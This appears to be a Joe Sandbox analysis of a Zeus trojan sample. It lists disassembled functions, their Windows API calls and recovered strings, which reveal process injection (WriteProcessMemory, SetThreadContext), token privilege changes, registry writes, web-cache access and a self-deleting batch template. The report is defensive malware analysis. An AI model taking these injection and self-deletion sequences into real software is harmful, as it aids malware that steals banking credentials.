Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C3346: HeapAlloc.KERNEL32(00000008,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?,?), ref: 003C3368
Part of subcall function 003C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?), ref: 003C3379

Strings

Z>d>2>n><>F>, xrefs: 003CA31B

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C4E7B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85

APIs

Part of subcall function 003C8737: GetTempPathW.KERNEL32(000000F6,?), ref: 003C874E

CharToOemW.USER32(?,?), ref: 003C4EAB
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 003C4F2F

Part of subcall function 003C8716: SetFileAttributesW.KERNEL32(00000080,00000080,003CB4CD,?), ref: 003C871F
Part of subcall function 003C8716: DeleteFileW.KERNEL32(?), ref: 003C8729

Part of subcall function 003C856B: CreateFileW.KERNEL32(003C4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 003C8585
Part of subcall function 003C856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003C85A8
Part of subcall function 003C856B: CloseHandle.KERNEL32(00000000), ref: 003C85B5

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

Strings

@echo off%sdel /F "%s", xrefs: 003C4EBE
/c "%s", xrefs: 003C4F01
bat, xrefs: 003C4E8B
ComSpec, xrefs: 003C4F2A

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C4B0F, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C4B1F
GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,00000000,76C61857,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C4B3F
GetLastError.KERNEL32(?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C4B45

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,00000000,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C4B6C
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C4B74
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C4B8B

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

CloseHandle.KERNEL32(?), ref: 003C4BB6

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C795E, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 003C797D
PathAddBackslashW.SHLWAPI(?), ref: 003C7994
PathRemoveBackslashW.SHLWAPI(?), ref: 003C79A5
PathRemoveFileSpecW.SHLWAPI(?), ref: 003C79B2
PathAddBackslashW.SHLWAPI(?), ref: 003C79C3
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 003C79D2
CLSIDFromString.OLE32(?,?), ref: 003C79EC

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C78D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 003C78FD

Part of subcall function 003C773A: CharUpperW.USER32(00000000), ref: 003C785B

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 003C792F
RegCloseKey.ADVAPI32(?), ref: 003C7938
RegCloseKey.ADVAPI32(?), ref: 003C7952

Strings

d, xrefs: 003C7943
SOFTWARE\Microsoft, xrefs: 003C78F0

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C6A3C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43

APIs

Part of subcall function 003C4A87: GetCurrentThread.KERNEL32(00000020,00000000,003CC9A1,00000000,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4A97
Part of subcall function 003C4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4A9E
Part of subcall function 003C4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,003CC9A1,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4AB0
Part of subcall function 003C4A87: LookupPrivilegeValueW.ADVAPI32(00000000,003CC9A1,?), ref: 003C4AD4
Part of subcall function 003C4A87: AdjustTokenPrivileges.ADVAPI32(003CC9A1,00000000,00000001,00000000,00000000,00000000), ref: 003C4AE9
Part of subcall function 003C4A87: GetLastError.KERNEL32 ref: 003C4AF3
Part of subcall function 003C4A87: CloseHandle.KERNEL32(003CC9A1), ref: 003C4B02

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 003C6A5B
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 003C6A77
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 003C6A8E
LocalFree.KERNEL32(00000000), ref: 003C6A9D

Strings

SeSecurityPrivilege, xrefs: 003C6A43
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 003C6A56

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040B31C, Relevance: 9.2, APIs: 6, Instructions: 197

APIs

GetAncestor.USER32(?,00000002), ref: 0040B345
SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0040B370
PostMessageW.USER32(?,00000020,?,00000000), ref: 0040B3B2

Part of subcall function 0040B23D: GetTickCount.KERNEL32 ref: 0040B2A3
Part of subcall function 0040B23D: GetClassLongW.USER32(?,000000E6), ref: 0040B2D8

GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B448
PostMessageW.USER32(?,00000112,?,?), ref: 0040B49B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B4DA

Part of subcall function 0040B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
Part of subcall function 0040B0AD: ReleaseMutex.KERNEL32(?), ref: 0040B0E7
Part of subcall function 0040B0AD: IsWindow.USER32(?), ref: 0040B0EE
Part of subcall function 0040B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
Part of subcall function 0040B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BB31C, Relevance: 9.2, APIs: 6, Instructions: 197

APIs

GetAncestor.USER32(?,00000002), ref: 003BB345
SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 003BB370
PostMessageW.USER32(?,00000020,?,00000000), ref: 003BB3B2

Part of subcall function 003BB23D: GetTickCount.KERNEL32 ref: 003BB2A3
Part of subcall function 003BB23D: GetClassLongW.USER32(?,000000E6), ref: 003BB2D8

GetWindowThreadProcessId.USER32(?,00000000), ref: 003BB448
PostMessageW.USER32(?,00000112,?,?), ref: 003BB49B
GetWindowThreadProcessId.USER32(?,00000000), ref: 003BB4DA

Part of subcall function 003BB0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 003BB0B3
Part of subcall function 003BB0AD: ReleaseMutex.KERNEL32(?), ref: 003BB0E7
Part of subcall function 003BB0AD: IsWindow.USER32(?), ref: 003BB0EE
Part of subcall function 003BB0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 003BB108
Part of subcall function 003BB0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 003BB110

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00409694, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00409709
StrStrIW.SHLWAPI(?,?), ref: 00409796
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 004097BE
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 004097DB
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 0040980C
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 0040982D

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B9694, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 003B9709
StrStrIW.SHLWAPI(?,?), ref: 003B9796
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 003B97BE
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 003B97DB
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 003B980C
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 003B982D

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041A3B1, Relevance: 9.2, APIs: 6, Instructions: 153

APIs

EnterCriticalSection.KERNEL32(00423F24), ref: 0041A3C2
LeaveCriticalSection.KERNEL32(00423F24), ref: 0041A425

Part of subcall function 0041A298: ResetEvent.KERNEL32(?), ref: 0041A2A6
Part of subcall function 0041A298: InternetSetStatusCallbackW.WININET(?,0041A24F), ref: 0041A2DB
Part of subcall function 0041A298: InternetReadFileExA.WININET ref: 0041A31B
Part of subcall function 0041A298: GetLastError.KERNEL32 ref: 0041A325
Part of subcall function 0041A298: InternetSetStatusCallbackW.WININET(?,?), ref: 0041A389

EnterCriticalSection.KERNEL32(00423F24), ref: 0041A442
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0041A4C6

Part of subcall function 0041856B: CreateFileW.KERNEL32(00414E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00418585
Part of subcall function 0041856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004185A8
Part of subcall function 0041856B: CloseHandle.KERNEL32(00000000), ref: 004185B5

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00415505
Part of subcall function 004154F1: GetLastError.KERNEL32 ref: 0041550F
Part of subcall function 004154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0041552F

Part of subcall function 004114C3: InternetCrackUrlA.WININET ref: 004117AC
Part of subcall function 004114C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 004117CA
Part of subcall function 004114C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 004118E4
Part of subcall function 004114C3: EnterCriticalSection.KERNEL32(00422AC8), ref: 00411910
Part of subcall function 004114C3: LeaveCriticalSection.KERNEL32(00422AC8,?,?), ref: 0041194D

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

SetLastError.KERNEL32(00002EE4), ref: 0041A51C
LeaveCriticalSection.KERNEL32(00423F24), ref: 0041A585

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CA3B1, Relevance: 9.2, APIs: 6, Instructions: 153

APIs

EnterCriticalSection.KERNEL32(003D3F24), ref: 003CA3C2
LeaveCriticalSection.KERNEL32(003D3F24), ref: 003CA425

Part of subcall function 003CA298: ResetEvent.KERNEL32(?), ref: 003CA2A6
Part of subcall function 003CA298: InternetSetStatusCallbackW.WININET(?,003CA24F), ref: 003CA2DB
Part of subcall function 003CA298: InternetReadFileExA.WININET ref: 003CA31B
Part of subcall function 003CA298: GetLastError.KERNEL32 ref: 003CA325
Part of subcall function 003CA298: InternetSetStatusCallbackW.WININET(?,?), ref: 003CA389

EnterCriticalSection.KERNEL32(003D3F24), ref: 003CA442
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 003CA4C6

Part of subcall function 003C856B: CreateFileW.KERNEL32(003C4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 003C8585
Part of subcall function 003C856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003C85A8
Part of subcall function 003C856B: CloseHandle.KERNEL32(00000000), ref: 003C85B5

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 003C5505
Part of subcall function 003C54F1: GetLastError.KERNEL32 ref: 003C550F
Part of subcall function 003C54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 003C552F

Part of subcall function 003C14C3: InternetCrackUrlA.WININET ref: 003C17AC
Part of subcall function 003C14C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 003C17CA
Part of subcall function 003C14C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 003C18E4
Part of subcall function 003C14C3: EnterCriticalSection.KERNEL32(003D2AC8), ref: 003C1910
Part of subcall function 003C14C3: LeaveCriticalSection.KERNEL32(003D2AC8,?,?), ref: 003C194D

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

SetLastError.KERNEL32(00002EE4), ref: 003CA51C
LeaveCriticalSection.KERNEL32(003D3F24), ref: 003CA585

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040929D, Relevance: 9.1, APIs: 6, Instructions: 148

APIs

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 004092D4
StrStrIW.SHLWAPI(?,?), ref: 0040935C
StrStrIW.SHLWAPI(?,?), ref: 0040936D
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00409389
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 004093A7
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 004093C1

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B929D, Relevance: 9.1, APIs: 6, Instructions: 148

APIs

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 003B92D4
StrStrIW.SHLWAPI(?,?), ref: 003B935C
StrStrIW.SHLWAPI(?,?), ref: 003B936D
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 003B9389
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 003B93A7
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 003B93C1

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00411049, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395

APIs

EnterCriticalSection.KERNEL32(00422AC8), ref: 00411064
LeaveCriticalSection.KERNEL32(00422AC8), ref: 004110E7
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 004111B2

Part of subcall function 0041AE54: EnterCriticalSection.KERNEL32(00423FB4,?,004111CF,?), ref: 0041AE5B
Part of subcall function 0041AE54: LeaveCriticalSection.KERNEL32(00423FB4), ref: 0041AE90

Part of subcall function 0041AE9A: EnterCriticalSection.KERNEL32(00423FB4,?,00000000,004113AE,00000000), ref: 0041AEA6
Part of subcall function 0041AE9A: LeaveCriticalSection.KERNEL32(00423FB4), ref: 0041AEF1

InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 004113EC

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00410AA1: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410C73
Part of subcall function 00410AA1: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410C93
Part of subcall function 00410AA1: RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410CA6
Part of subcall function 00410AA1: GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410CB5

Part of subcall function 00419B3E: CreateMutexW.KERNEL32(00422C30,00000000,00423F40,?,?,?,004079E5), ref: 00419B66

Strings

, xrefs: 00411301

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C1049, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395

APIs

EnterCriticalSection.KERNEL32(003D2AC8), ref: 003C1064
LeaveCriticalSection.KERNEL32(003D2AC8), ref: 003C10E7
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 003C11B2

Part of subcall function 003CAE54: EnterCriticalSection.KERNEL32(003D3FB4,?,003C11CF,?), ref: 003CAE5B
Part of subcall function 003CAE54: LeaveCriticalSection.KERNEL32(003D3FB4), ref: 003CAE90

Part of subcall function 003CAE9A: EnterCriticalSection.KERNEL32(003D3FB4,?,00000000,003C13AE,00000000), ref: 003CAEA6
Part of subcall function 003CAE9A: LeaveCriticalSection.KERNEL32(003D3FB4), ref: 003CAEF1

InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 003C13EC

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C0AA1: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 003C0C73
Part of subcall function 003C0AA1: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 003C0C93
Part of subcall function 003C0AA1: RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 003C0CA6
Part of subcall function 003C0AA1: GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 003C0CB5

Part of subcall function 003C9B3E: CreateMutexW.KERNEL32(003D2C30,00000000,003D3F40,?,?,?,003B79E5), ref: 003C9B66

Strings

, xrefs: 003C1301

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041C49B, Relevance: 9.1, APIs: 6, Instructions: 85

APIs

NtCreateUserProcess.NTDLL(?,?), ref: 0041C4CC

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

GetProcessId.KERNEL32(?), ref: 0041C509

Part of subcall function 0041245B: CreateMutexW.KERNEL32(00422C30,00000001,?,00422E70,76C605D7,?,00000002,?,76C605D7), ref: 004124A3
Part of subcall function 0041245B: GetLastError.KERNEL32 ref: 004124AF
Part of subcall function 0041245B: CloseHandle.KERNEL32(00000000), ref: 004124BD

Part of subcall function 00412542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00412574
Part of subcall function 00412542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125AB
Part of subcall function 00412542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125CB
Part of subcall function 00412542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0041316D,?,00000000), ref: 0041261A

GetThreadContext.KERNEL32 ref: 0041C557
SetThreadContext.KERNEL32(00000000,00000000), ref: 0041C596
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 0041C5AD
CloseHandle.KERNEL32(?), ref: 0041C5B7

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041D325, Relevance: 9.1, APIs: 6, Instructions: 78

APIs

Part of subcall function 00412828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

PathRemoveFileSpecW.SHLWAPI(?), ref: 0041D34A
PathRemoveFileSpecW.SHLWAPI(?), ref: 0041D35D

Part of subcall function 0041C86B: SetEvent.KERNEL32(0041D36D,00000000), ref: 0041C871
Part of subcall function 0041C86B: WaitForSingleObject.KERNEL32(FFFFFFFF,000000FF), ref: 0041C884

Part of subcall function 0040BCAF: SHDeleteValueW.SHLWAPI(80000001,?,?), ref: 0040BCEC
Part of subcall function 0040BCAF: Sleep.KERNEL32(000001F4), ref: 0040BCFB
Part of subcall function 0040BCAF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0040BD11

Part of subcall function 00418A29: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00418A5A
Part of subcall function 00418A29: FindNextFileW.KERNEL32(00000000,?), ref: 00418AB5
Part of subcall function 00418A29: FindClose.KERNEL32(00000000), ref: 00418AC0
Part of subcall function 00418A29: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00418ACC
Part of subcall function 00418A29: RemoveDirectoryW.KERNEL32(?), ref: 00418AD3

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0041D39B
CharToOemW.USER32(?,?), ref: 0041D3B7
CharToOemW.USER32(?,?), ref: 0041D3C6

Part of subcall function 004140F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 0041410D

ExitProcess.KERNEL32(00000000), ref: 0041D41C

Part of subcall function 00414E7B: CharToOemW.USER32(?,?), ref: 00414EAB
Part of subcall function 00414E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00414F2F

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CD325, Relevance: 9.1, APIs: 6, Instructions: 78

APIs

Part of subcall function 003C2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 003C28A1

PathRemoveFileSpecW.SHLWAPI(?), ref: 003CD34A
PathRemoveFileSpecW.SHLWAPI(?), ref: 003CD35D

Part of subcall function 003CC86B: SetEvent.KERNEL32(003CD36D,00000000), ref: 003CC871
Part of subcall function 003CC86B: WaitForSingleObject.KERNEL32(00000148,000000FF), ref: 003CC884

Part of subcall function 003BBCAF: SHDeleteValueW.SHLWAPI(80000001,?,?), ref: 003BBCEC
Part of subcall function 003BBCAF: Sleep.KERNEL32(000001F4), ref: 003BBCFB
Part of subcall function 003BBCAF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 003BBD11

